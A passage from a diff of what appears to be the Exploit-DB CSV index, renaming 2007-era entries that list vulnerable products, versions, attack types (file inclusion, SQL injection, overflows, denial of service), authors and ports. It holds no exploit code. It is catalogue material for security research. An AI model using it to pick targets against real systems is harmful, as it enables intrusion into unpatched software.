INVITE) Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0 3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows/x86) - Remote Denial of Service",2007-03-20,mu-b,windows,dos,0 -3528,platforms/php/webapps/3528.pl,"PHPRaid < 3.0.7 - (rss.php PHPraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 +3528,platforms/php/webapps/3528.pl,"PHPRaid < 3.0.7 - (rss.php PHPraid_dir) Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 3529,platforms/linux/local/3529.php,"PHP 5.2.1 - hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 -3530,platforms/php/webapps/3530.pl,"Monster Top List 1.4.2 - (functions.php root_path) Remote File Inclusion Exploit",2007-03-20,fluffy_bunny,php,webapps,0 +3530,platforms/php/webapps/3530.pl,"Monster Top List 1.4.2 - (functions.php root_path) Remote File Inclusion",2007-03-20,fluffy_bunny,php,webapps,0 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",windows,remote,554 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) 0.15 - Remote File Inclusion",2007-03-21,K-159,php,webapps,0 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - (module.php) Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3534,platforms/asp/webapps/3534.txt,"Active Link Engine - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3535,platforms/hardware/dos/3535.pl,"Grandstream Budge Tone-200 IP Phone - (Digest domain) Denial of Service",2007-03-21,MADYNES,hardware,dos,0 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 -3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (SUBSCRIBE) Remote Exploit",2007-03-21,"Winny Thomas",windows,remote,143 +3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (Subscribe) Remote Exploit",2007-03-21,"Winny Thomas",windows,remote,143 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0 -3539,platforms/php/webapps/3539.txt,"mambo component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 -3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (Egghunter mod)",2007-03-21,muts,windows,remote,143 +3539,platforms/php/webapps/3539.txt,"mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 +3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (Egghunter)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote SEH Overwrite",2007-03-22,"Umesh Wanve",windows,remote,69 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0 3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 - (idnews) SQL Injection",2007-03-22,"Mehmet Ince",php,webapps,0 @@ -3211,59 +3212,59 @@ id,file,description,date,author,platform,type,port 3545,platforms/php/webapps/3545.txt,"Lms 1.8.9 - Vala Remote File Inclusion",2007-03-22,Kacper,php,webapps,0 3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 - (calendar.asp eventid) SQL Injection",2007-03-22,parad0x,asp,webapps,0 3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service",2007-03-22,DiGitalX,windows,dos,0 -3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion Exploit",2007-03-23,GoLd_M,php,webapps,0 +3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion",2007-03-23,GoLd_M,php,webapps,0 3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'default.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0 3554,platforms/linux/remote/3554.pm,"dproxy 0.5 - Remote Buffer Overflow (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)",2007-03-23,"Jon Hart",multiple,remote,0 -3556,platforms/asp/webapps/3556.htm,"Active Newsletter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0 +3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0 3557,platforms/php/webapps/3557.txt,"Joomla/Mambo Component SWmenuFree 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 -3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - unserialize() Local Information Leak Exploit",2007-03-23,"Stefan Esser",multiple,local,0 +3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - Unserialize() Local Information Leak Exploit",2007-03-23,"Stefan Esser",multiple,local,0 3560,platforms/php/webapps/3560.txt,"Joomla Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 -3561,platforms/windows/remote/3561.pl,"Mercury Mail 4.0.1 - (LOGIN) Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 +3561,platforms/windows/remote/3561.pl,"Mercury Mail 4.0.1 - 'LOGIN' Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 3563,platforms/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php lib_path' Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager 1.1 - SQL Injection",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards 2.4.3 - SQL Injection",2007-03-24,ajann,php,webapps,0 3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0 -3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu 1.07 - Remote File Inclusion Exploit",2007-03-25,"Cold Zero",php,webapps,0 +3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu 1.07 - Remote File Inclusion",2007-03-25,"Cold Zero",php,webapps,0 3568,platforms/php/webapps/3568.txt,"Free Image Hosting 2.0 - (AD_BODY_TEMP) Remote File Inclusion",2007-03-25,Crackers_Child,php,webapps,0 3569,platforms/php/webapps/3569.pl,"PBlang 4.66z - Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 -3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21 +3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overflow Exploit",2007-03-25,niXel,windows,remote,21 3571,platforms/linux/local/3571.php,"PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0 -3574,platforms/php/webapps/3574.pl,"PBlang 4.66z - Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 +3574,platforms/php/webapps/3574.pl,"PBlang 4.66z - Remote Code Execution",2007-03-25,Hessam-x,php,webapps,0 3575,platforms/windows/remote/3575.cpp,"Frontbase 4.2.7 (Windows) - Remote Buffer Overflow",2007-03-25,Heretic2,windows,remote,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0 -3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,anonymous,windows,remote,0 +3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double-Free Memory Exploit (MS07-009)",2007-03-26,anonymous,windows,remote,0 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - (PASS) Remote Exploit",2007-03-26,"Winny Thomas",windows,remote,21 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0 -3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0 -3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module Addressbook 1.2 - Local File Inclusion Exploit",2007-03-26,bd0rk,php,webapps,0 -3583,platforms/php/webapps/3583.txt,"C-Arbre 0.6PR7 - (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0 +3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution",2007-03-26,Hessam-x,php,webapps,0 +3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module AddressBook 1.2 - Local File Inclusion",2007-03-26,bd0rk,php,webapps,0 +3583,platforms/php/webapps/3583.txt,"C-Arbre 0.6PR7 - 'ROOT_PATH' Remote File Inclusion",2007-03-26,K-159,php,webapps,0 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g - KUPM$MCP.MAIN SQL Injection",2007-03-27,bunker,multiple,remote,0 -3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double Free (PoC)",2007-03-27,"Stefan Esser",linux,dos,0 +3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double-Free (PoC)",2007-03-27,"Stefan Esser",linux,dos,0 3587,platforms/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - (print.php id) SQL Injection",2007-03-27,WiLdBoY,php,webapps,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow (Metasploit)",2007-03-27,skillTube,windows,remote,80 3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,php,webapps,0 3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0 -3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0 -3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0 +3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion",2007-03-27,kezzap66345,php,webapps,0 +3593,platforms/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0 3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - (index.php cat_id) SQL Injection",2007-03-28,ajann,php,webapps,0 3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 -3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - (header.php) Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0 +3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0 3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - (view.php id) SQL Injection",2007-03-28,ajann,php,webapps,0 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - (quotes.php) Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 -3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - (phpbb_root_path) Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 +3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 -3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - (inc/lang.php) Local File Inclusion Exploit",2007-03-29,GoLd_M,php,webapps,0 -3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 +3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - (inc/lang.php) Local File Inclusion",2007-03-29,GoLd_M,php,webapps,0 +3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection",2007-03-29,ajann,php,webapps,0 3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - (wall.php cat) SQL Injection",2007-03-29,Kacper,php,webapps,0 @@ -3272,12 +3273,12 @@ id,file,description,date,author,platform,type,port 3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 -3611,platforms/php/webapps/3611.txt,"JC URLshrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 +3611,platforms/php/webapps/3611.txt,"JC URLShrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository - 'viewcat.php' SQL Injection",2007-03-30,ajann,php,webapps,0 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow",2007-03-30,mu-b,linux,remote,53 -3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Pre-Authenticated Remote Exploit",2007-03-31,muts,windows,remote,143 +3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit",2007-03-31,muts,windows,remote,143 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor '.ani' Stack Overflow",2007-03-31,devcode,windows,local,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0 @@ -3289,10 +3290,10 @@ id,file,description,date,author,platform,type,port 3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0 3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop 1.17 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0 3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143 -3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - (INCLUDE_PATH) Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0 +3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0 3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection",2007-04-01,ajann,php,webapps,0 3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - (genre.php) Blind SQL Injection",2007-04-01,ajann,php,webapps,0 -3631,platforms/php/webapps/3631.txt,"FlexPHPnews 0.0.5 - (news.php newsid) SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 +3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - (news.php newsid) SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps,0 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection",2007-04-01,ajann,php,webapps,0 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0 @@ -3302,28 +3303,28 @@ id,file,description,date,author,platform,type,port 3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - 'cid' SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - Remote File Inclusion",2007-04-02,"Hamid Ebadi",php,webapps,0 -3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section 1.01 - (articleid) SQL Injection",2007-04-02,ajann,php,webapps,0 -3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection 1.07 - (articleid) Blind SQL Injection",2007-04-02,ajann,php,webapps,0 +3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection",2007-04-02,ajann,php,webapps,0 +3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection",2007-04-02,ajann,php,webapps,0 3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - (print.php) SQL Injection",2007-04-02,ajann,php,webapps,0 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local,0 -3648,platforms/windows/local/3648.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0 +3648,platforms/windows/local/3648.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local,0 -3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Post-Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0 +3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Overflow (Hardware DEP)",2007-04-03,devcode,windows,local,0 -3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 +3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution",2007-04-03,DarkFig,php,webapps,0 3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0 3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog 2.52 - (postid) Blind SQL Injection",2007-04-03,ajann,php,webapps,0 -3656,platforms/php/webapps/3656.pl,"Wordpress 2.1.2 - (xmlrpc) SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0 +3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - (xmlrpc) SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0 3657,platforms/php/webapps/3657.txt,"MySpeach 3.0.7 - Remote / Local File Inclusion",2007-04-03,Xst3nZ,php,webapps,0 -3658,platforms/php/webapps/3658.htm,"PHPMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0 +3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0 -3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion Exploit",2007-04-04,bd0rk,php,webapps,0 +3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0 -3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution Exploit (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 +3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0 3664,platforms/windows/local/3664.txt,"TrueCrypt 4.3 - Privilege Escalation",2007-04-04,"Marco Ivaldi",windows,local,0 -3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion Exploit",2007-04-04,bd0rk,php,webapps,0 +3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - mutant_functions.php Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - (visit.php) SQL Injection",2007-04-04,ajann,php,webapps,0 3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 @@ -3333,24 +3334,24 @@ id,file,description,date,author,platform,type,port 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs 2.4 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 3673,platforms/php/webapps/3673.txt,"WebSPELL 4.01.02 - (picture.php) File Disclosure",2007-04-05,Trex,php,webapps,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service",2007-04-05,WiLdBoY,windows,dos,0 -3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - (LIST) Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21 +3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21 3676,platforms/php/webapps/3676.txt,"Beryo 2.0 - (downloadpic.php chemin) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 - (download2.php fn1) Remote File Disclosure",2007-04-06,GoLd_M,php,webapps,0 3678,platforms/php/webapps/3678.php,"SmodBIP 1.06 - (aktualnosci zoom) SQL Injection",2007-04-06,Kacper,php,webapps,0 3679,platforms/php/webapps/3679.php,"SmodCMS 2.10 - (Slownik ssid) SQL Injection",2007-04-06,Kacper,php,webapps,0 3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite (Windows/x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80 3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 - (smilies.php config) Remote File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 -3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] Local File Inclusion Exploit",2007-04-08,bd0rk,php,webapps,0 +3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 - GLOBALS[name] Local File Inclusion",2007-04-08,bd0rk,php,webapps,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service",2007-04-08,Marsu,windows,dos,0 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software - Remote File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 - (index.php menu) Local File Inclusion",2007-04-08,the_Edit0r,php,webapps,0 -3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 - (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0 +3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 - (sn_admin_dir) Local File Inclusion",2007-04-08,BeyazKurt,php,webapps,0 3688,platforms/windows/local/3688.c,"Microsoft Windows GDI - Privilege Escalation (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 -3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - (lang) Local File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 +3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 - 'lang' Local File Inclusion",2007-04-08,Dj7xpl,php,webapps,0 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - SQL Injection",2007-04-09,"h a c k e r _ X",php,webapps,0 -3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 -3693,platforms/windows/dos/3693.txt,"Microsoft Windows - (.hlp) Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0 +3692,platforms/windows/local/3692.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 +3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps,0 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0 3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - (warn.php) Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 @@ -3364,26 +3365,26 @@ id,file,description,date,author,platform,type,port 3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0 -3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - (absolute_path) Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 -3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Transversal Exploit",2007-04-11,shinnai,multiple,remote,0 -3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - non-existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0 -3710,platforms/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code 